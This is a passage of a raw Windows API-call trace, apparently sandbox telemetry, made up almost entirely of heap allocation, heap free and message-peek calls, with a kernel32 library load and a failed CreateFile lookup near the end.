hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0191.021] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0191.021] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0191.021] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.023] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.023] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.023] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.023] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b10 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0191.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd960 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0191.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0191.024] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0191.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0191.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0191.026] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.028] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.029] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.029] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.029] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd858 [0191.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd858, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0191.030] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0191.030] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.030] RtlAllocateHeap (HeapHandle=0x8a0000, 